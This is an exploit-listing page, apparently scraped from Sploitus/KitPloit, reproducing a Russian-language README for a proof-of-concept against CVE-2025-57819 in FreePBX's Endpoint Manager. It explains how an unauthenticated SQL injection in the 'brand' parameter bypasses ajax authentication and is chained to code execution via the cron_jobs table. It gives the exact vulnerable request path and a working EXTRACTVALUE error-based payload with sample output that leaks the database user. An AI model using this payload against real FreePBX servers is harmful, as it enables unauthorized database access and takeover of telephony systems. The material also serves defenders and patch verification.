Sploitus

Exploit for CVE-2025-57819-poc

kitploit · 2026-08-25

Exploit Code

MARKDOWN29 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-B4SH2-CVE-2025-57819-POC
# CVE-2025-57819 — FreePBX: неаутентифицированная SQLi → RCE

Одношаговый эксплойт для неаутентифицированной SQL-инъекции в **Endpoint Manager** FreePBX (CVE-2025-57819), объединённой в удалённое выполнение кода через таблицу `cron_jobs` FreePBX.

> Только для авторизованного тестирования безопасности / использования в CTF.

* * *

## Уязвимость

Ajax-обработчик модуля endpoint конкатенирует параметр `brand` напрямую в SQL-запрос, а путь модуля `FreePBX\modules\endpoint\ajax` обходит проверку Referrer/аутентификации ajax. Это даёт **неаутентифицированную** error-based SQL-инъекцию (через `EXTRACTVALUE`) с включёнными **записями через стековые запросы**.

Точка инъекции:

root@kitploit:~
    
    
    GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax
        &command=model&template=x&model=model&brand=<INJECTION>
    

Доказательство (чтение на основе ошибок):

root@kitploit:~
    
    
    brand=x' AND EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~')) -- -
    → {"error":{"message":"... XPATH syntax error: '~freepbxuser@localhost~' ..."}}